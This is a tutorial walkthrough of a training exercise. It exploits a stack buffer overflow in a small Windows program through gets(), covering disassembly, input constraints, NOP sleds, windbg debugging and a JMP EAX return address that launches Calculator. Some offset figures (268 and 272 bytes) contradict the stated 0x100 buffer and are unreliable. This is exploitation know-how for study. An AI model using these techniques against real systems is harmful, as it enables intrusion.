Things you'll need:

Disassembly goals:

Familiarize yourself with the logic of the program. Some noteworthy
things in particular are:

Size of stack space created

Offsets and functions of stack variables

Calls to subroutines

Types of input (streams, arguments)

Branching of execution/jmp statements

Next, look at the
executable's disassembly. You can use IDA or anything
that'll get the job done.

When reading assembly, especially if you're more accustomed to
high-level languages like C, you'll want to avoid trying to absorb the
code instruction-by-instruction. Look at blocks of instructions to
figure out how they work together to do something useful.

In the example program:

push ebp
mov ebp, esp
sub esp, 100h

Blocks like this are typical. When a function is called (in this case, our main), the address of the next
instruction after call is saved on the stack. This is called the "return address"; once the function
terminates, this address lets the processor know where to resume execution.

Once the return address is pushed, the old ebp is also pushed onto the stack and our old ESP
becomes the new EBP. Once that's done, space is reserved on
the stack for local variables. In this case, the size of the stack
space created is 100 hex (256 bytes).

Furthermore, IDA shows us the offsets of important variables/locations
in that reserved space that will be used later by the program. This
is displayed above the start of main.

Buffer= byte ptr -100h
var_FD= byte ptr -0FDh

These are also good to take note of for when they're referenced later.

b) What kind of vulnerability are we looking at? How and where is the
program exploitable?

The next thing to look for are areas where the program could
potentially be vulnerable. For stack-based buffer overflows, this will
take the form of user input that is copied into the stack without
validating whether there is enough space reserved for it. String
functions like strcpy(), for instance, don't inherently provide for
any sort of bounds checking beyond null-character termination and are
typically exploitable.

Our first function call is a call to gets():

lea eax, [ebp+Buffer]
push eax ; Buffer
call _gets

As we can see, EAX is loaded with the address of buffer and then
supplied as an argument to the gets() call. Since user input will be
copied into buffer (on the stack) from stdin with no bounds checking,
this looks like a good candidate for a stack-based buffer overflow
vulnerability.

From earlier, we know that Buffer is located at a 100 hex offset from
EBP, or EBP-100. Our saved return address is located at EBP+4,
starting 268 bytes higher than Buffer. In order to cleanly overwrite
it with our own data, we'll need to supply Buffer with 260 + 4 bytes =
272.

c) What obstacles and constraints on input are we faced with?

Successful exploitation hinges on hijacking EIP, but even if
you've overwritten the return address on the stack, execution will not
be yours until you hit your RET instruction. Though a seemingly
trivial point, it bears mentioning that this means you'll need to make
sure execution doesn't terminate or branch off before you gain
control. Input will need to be crafted such that the necessary
execution conditions are satisfied.

The first block compares the byte at EBP-FD(-253 decimal) with the
hex value 78 (ASCII 'x'). If they match, execution then jumps over the
second block entirely, which is an exit call. Allowing the program to
call exit() will prematurely terminate the program, which is very bad
for us; execution will never arrive at the RET instruction we're
relying on to pop our overwritten return address off the stack and
into EIP.

Given this observation, it's safe to say that we need to make the
byte at EBP-FD to be lowercase 'x'. EBP-FD is also the fourth byte of
our Buffer, which is fed through standard input. In order for our
exploitation to succeed, we'll need to feed 'x' as the fourth
character in our payload.

Method of Delivery:

a) Delivering your shellcode.

Shellcode is delivered in the form of hex byte instructions
written for the target platform. This can be defined as a hex string
in your scripting language of choice, most often using the \xNN
format. Perl is highly recommended - strings are easily created and appended
to one another, and you can use perl's print() function in conjunction
with the pipe operator "|" in cygwin to pump your shellcode output to
the exploitable program.

Cygwin is a linux-like shell environment for Windows. When setting up
cygwin, you also have the option of installing various packages. Make
sure you get perl and gcc.

Furthermore, while it's not necessary for this example, you can also
pass the output of a perl scripts as arguments from the command line,
in which case you'll need to enclose each statement within ticks (`),
located on the same key as tilde (~):

./example `perl -e 'print "ARGUMENT1"'`
./example `perl exploit.pl`

b) Structure your payload to work with the constraints on input and
satisfy conditions of execution.

We know from our disassembly that the fourth character we supply
to our vulnerable program needs to be lowercase 'x' (0x78). After
that, we have 256 bytes to fill before we overwrite the return
address. What a fantastic place to put your shellcode! It will,
however, need to be padded; the shellcode is only 127 bytes.

The most commonly used padding tends to be what are called "NOP
instructions". NOP instructions are instructions that perform either
no operation or one that will not really interfere with the operation
of our shellcode. The latter is, of course, context-dependent. The
most common are 0x90 (NOP - does nothing) and 0x41 (Both ASCII "A" AND
inc ecx, depending on whether it's interpreted as data or an
instruction). The fact that they're single-byte instructions makes
them ideal for plugging up holes. Not only that, but if you miss your
shellcode and EIP lands somewhere on your padding before your
shellcode, the processor will execute these NOP instructions
one-by-one until it gets to the beginning of your shellcode. This
technique is called a "NOP sled".

Debugging:

a) Setting up windbg as your post-mortem debugger.

You can register windbg as your port-mortem debugger with the -I
option. In Win 2000, you'll want to select "run" from the start menu,
browse for the location of windbg (usually debugging tools for
Windows), and then append -I as an argument:

"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" -I

Post-mortem means that when a program throws an exception (for
example, crashes), Windows will give the debugger a chance to deal
with it before passing it to an exception handler. So, say you
overwrite the return address on the stack with "AAAA"; this will cause
an Access Violation when the processor tries to resume execution at
address 0x41414141, and your debugging environment will fire up
automatically.

The commands you'll probably use most for this exercise are p and
t (step over/step into respectively), bp 0xNNNNNNNN (set breakpoint at
address 0xNNNNNNNN), and g (continue to next breakpoint).

b) Testing hypotheses by observation of stack behavior/registers.

You won't always succeed in popping a shell on the first try. Don't despair!

First, focus on owning EIP. Keep an eye on the stack. Observe its
behavior at several different points of execution as well as its
effect on the location of your saved return address. Try first
overwriting it with ASCII to see if you manage to cause an access
violation, then use a separate 4-byte string, once that's
distinguishable from other padding (if your padding is A's, try
"BBBB"), and place it at the point in your payload where you -think-
you'll be overwriting the return address. This will ensure that you're
not overshooting the return address completely.

If you're still not getting EIP and you swear you've provided
enough characters to cause an overflow, the problem may lie in the
execution. Try stepping through the program with the debugger to see
if you ever reach your RET instruction; maybe something was
overlooked. For example, our program calls exit() unless 'x' is the
4th byte of our payload.

c) Dealing with non-stack addresses.

One of the victory conditions for these awbo exercises is that you
must successfully exploit the program without explicitly referencing
any stack addresses. In other words, the return address should not be
overwritten with an address on the stack, but you may use any other
address in memory.

Remember -- data is just data; it's how it's interpreted that's
important, and there are other ways to get to the stack. The stack
address you need to jump to might still be in one of your registers,
or even on the stack itself. If only there were some instruction in
memory you could use to your advantage... Hmm...

In our example program, if you set a breakpoint at the address of
RET (bp 0x00401038 for me) and examine your registers, you'll notice
something: the address of the first byte of our buffer happens to be
sitting in the EAX register. A JMP EAX instruction would get us there
painlessly. All we need to do is find it in memory.

You can search for bytes, words, doublewords and ASCII in
windbgwith the "s" command. The syntax is listed in the windbg
cheatsheet:

To review:

"AAAx" satisfies our requirement that the 4th byte be "x".
'$filler' is our padding.
'$shellcode' is the code that will actually be executed.
"\x58\x40\x2b\x00" is the address of our JMP EAX instruction, fed to the program in reverse-byte order
because of little-endianness.

Just pipe it to your program, run 'g' from the windbg command line and voila! Calculator!